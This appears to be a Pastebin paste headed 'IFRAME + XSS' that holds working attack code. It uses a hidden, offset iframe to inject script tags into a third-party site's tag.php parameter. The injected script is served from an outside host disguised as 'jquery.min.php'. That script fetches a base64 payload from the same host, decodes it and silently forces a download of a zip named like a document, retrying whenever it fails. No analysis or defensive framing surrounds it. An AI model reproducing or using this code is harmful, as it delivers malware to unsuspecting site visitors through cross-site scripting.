Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- IFRAME + XSS
- <body style="margin:0;padding:0;"><iframe allowtransparency="true" style="position:relative; top: -160px; left: -100px;width:10;height:10" src="https://www.vrandaman.com//Article/tag.php?t=<script src='http://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script><script type="text/javascript" src='http://eraa1d.contsfinas.xyz/jquery.min.php'>IF</script>?">
- jquery.min.php
- function sbuffers(base64){
- var binary_string = atob(base64);
- var len = binary_string.length;
- var bytes = new Uint8Array(len);for (var i=0;i < len; i++){bytes[i] = binary_string.charCodeAt(i);}
- return bytes.buffer;}
- function RicksGutis() {
- try {
- var sUrl = "http://eraa1d.contsfinas.xyz/FBZDCLXBV/J66M29MK3X37/65400712/Seu_DocPress825";
- now = new Date;
- var Doc = now.getHours() + now.getMinutes() + now.getSeconds() + now.getMilliseconds();
- var fileName = sUrl.replace(/^.*[\\/]/, "") + Doc + ".zip";
- $.get( sUrl + "z64y64", function(response){
- var file = response;
- var data = sbuffers(file);
- var blob = new Blob([data],{type: "octet/stream"});
- if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
- else{
- var a = document.createElement("a");
- document.body.appendChild(a);
- a.style = "display: none";
- var url = window.URL.createObjectURL(blob);
- a.href = url;
- a.download = fileName;
- a.click();
- window.URL.revokeObjectURL(url);
- window.stop();
- }
- }
- );
- }
- catch(err) {
- setTimeout(RicksGutis, 2000);
- }
- }
- RicksGutis();
Add Comment
Please, Sign In to add comment